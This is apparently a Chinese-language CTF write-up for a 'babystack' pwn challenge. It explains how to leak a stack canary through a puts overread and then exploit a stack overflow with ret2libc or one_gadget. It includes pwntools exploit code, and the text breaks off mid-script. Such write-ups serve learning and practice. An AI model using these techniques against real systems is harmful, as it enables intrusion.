拿到题目checksec一下,发现开了canary保护。
分析源程序,也很容易找到溢出点,题目开了canary,很显然v6就是canary,s与v6的距离为0x90-0x8=0x88.题目得逻辑也很简单,输入1进行read操作,2进行puts,3退出。
那么思路就很清楚了,通过read填充0x88个a,然后通过puts打印,因为puts碰到\x00才会停止打印,
那么就会有疑惑了,众所周知canary的最后一个字节为\x00,那打印0x88个’a’之后不是直接停止打印了吗?后来用gdb看了一下发现canary的最后一个字节被填充成了0x0a(换行符)
输入a之前
输入a之后
也就是说如果puts的话我们的canary会完整的打印下来(最后一个字节不要,因为最后一个字节应该是\x00)
获取canary:
r.sendlineafter('>> ', '1')
sleep(0.5)
r.sendline('a'*0x88)
r.sendlineafter('>> ', '2')
r.recvuntil('a\n')
canary = u64('\x00'+ r.recv(7))
获得canary之后,我们就可以利用刚开始发现的栈溢出漏洞了。
需要注意的是,题目给的libc有点问题,用正常的ret2libc调用给的libc库构造system("/bin/sh")的方法行不通。我找到了三种方法1.将"/bin/sh"改成"/sh\0",2.使用LibcSearcher打远程,3.使用题目提供的libc库找one_gadget
exp1:
from pwn import*
#r = process('./babystack')
r = remote('')
elf = ELF('./babystack')
libc = ELF('./libc-2.23.so')
pop_rdi = 0x400a93
main = 0x400908
one_gadget = 0x45216
r.sendlineafter